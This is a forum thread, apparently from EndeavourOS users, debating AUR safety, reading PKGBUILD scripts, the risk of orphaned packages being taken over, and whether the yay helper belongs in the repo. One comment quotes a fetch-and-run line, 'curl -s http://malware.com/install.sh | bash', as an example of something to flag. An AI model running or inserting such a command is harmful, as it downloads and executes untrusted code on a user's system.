Because PKGBUILD is a shell script, which anyone can upload to the AUR. What you are doing when you’re building foreign packages from the AUR is running scripts on your computer written by random strangers online. And when you are doing it with yay you are automating the process. Just consider the security implications of that…
What makes the AUR safe to use is its transparency – you can know exactly what goes into the package and where it is sourced from – but that works only if you understand the process and actually check the build files.
Sure i understand that point but what i don’t understand is why they have issues with installing a pkg that is in the AUR. I don’t know what packages they are trying to install but any that i have used i have had zero issues with.
Edit: I just pick ones i can trust like btrfs-assistant
From my side no problem installing, but like OP would like to know more what is being asked and implications of what one chooses when installing packages via AUR using yay helper. It’s easy to click yes or enter and install, but would be better to know what we are doing. So in a way the question asked was to find a good guide to understand what is going on when installing a AUR package. I am probably formulating that wrong but think that’s what the OP asked.
I’m am at least reading the package build script and check sources where things come from… But it never went beyond that until now.
I guess if i have no idea about the package i might be curious and or cautious. But i use only a few well known packages that are trustworthy so i don’t need to change any of the defaults.
That’s always a good idea, of course. But that doesn’t mean you can be completely careless. AUR packages get orphaned all the time, and then random people can take them over.
While these things almost never happen, I can easily imagine a situation where someone wanting to spread malware takes over a recently orphaned package that is very popular – these are the most tempting packages, of course. Naturally, such an attempt will get discovered very quickly, but if you’re unlucky and update the package before that… Well, you might be mining crypto for months before you notice anything.
I think that should be more than enough. You only need to know enough to be able to take a look at a script and see that it is not doing anything fishy. E.g. if you see a line like
curl -s http://malware.com/install.sh | bash
you should certainly flag that package. You don’t need to be a shell programmer for that.
Oh. I mean I backup like photos and documents. Just not like my OS, there’s no real need. Chroot and fix is too easy to warrant it.
For actual things like photos I have a 4TB HDD with a second 4TB drive with a sabrent drive duplicator. So I save everything as a backup on drive 1 and monthly I attach the second drive and press play and it gets backed up redundantly.
I think I’ve said this before as well. I actually think yay should be removed, that way at least everyone needs to build one package. It would truly solidify EOS as intermediate instead of flirting with beginner syndrome all the time.
I think that would be overkill. But I use mostly pacman anyways… That would build a barrier if you want to filter out absolute beginner users or get bad review criticism about the distro… Probably not a good idea from dev perspective, more troubleshooting and more questions in the forum could issue from that too perhaps.
Overkill to build one package? I think asking everyone to build one if not only one package so they know how is not overkill at all.
We already admit we’re not for absolute beginners. . . So why cater to them? And while this project has gained serious accolades That’s never been the goal. Beginners are the loudest critics.
That’s one way to see it. That’s true about criticism and beginners and all.
I am just not in favor of removing yay just so the users has to build a package manually. Just my opinion. I agree that users should read the wiki and understand AUR before using it
Perhaps you are right, it could be a teaching moment, and filter out some users that are better off not using arch. But I don’t think that’s the eos way (we don’t want to exclude, even beginners).
I think EndeavourOS is perfectly fine for absolute first time Linux users, just not everyone. Only those who are willing to learn about their OS, use the terminal and are not lazy to RTFM.
Personally, I wouldn’t have any objection to removing yay from the repo.
Or a great teaching moment where folks can learn how to use the AUR. I’d rather have a walk through tutorial on welcome app to install yay and explain the AUR than to have the fiasco when pacman was updated last and yay broke, or a 2500+ thread on how to install grub.
I don’t see it as excluding anyone. But giving someone the keys to all the AUR and then asking them to learn how to use it afterwards is a little backwards, but it’s not my distro, just my opinion.
